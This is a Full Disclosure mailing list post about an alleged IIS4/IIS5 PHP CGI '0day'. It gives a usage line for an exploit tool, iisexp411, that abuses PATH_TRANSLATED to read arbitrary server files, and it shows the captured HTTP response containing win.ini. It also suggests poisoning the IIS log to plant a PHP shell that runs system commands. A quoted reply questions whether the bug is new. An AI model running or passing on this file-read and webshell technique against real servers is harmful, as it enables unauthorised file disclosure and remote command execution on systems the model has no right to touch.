Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1.

http://seclists.org/fulldisclosure/2012/Apr/13

usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini

yuan can get the file c:\windows\win.ini

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 10 Apr 2014 02:11:37 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo
[SciCalc]
layout=0

You can use the IIS log file write phpshell, execute the PHP call system cmd.

> Date: Wed, 9 Apr 2014 23:11:28 +0300
> From: kirils.solovj...@kirils.com
> To: yuange1...@hotmail.com
> Subject: Re: [FD] iis cgi 0day
>
> Sorry, I don't read Chinese.
> How is this a 0day?
>
> --
> Kirils Solovjovs

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/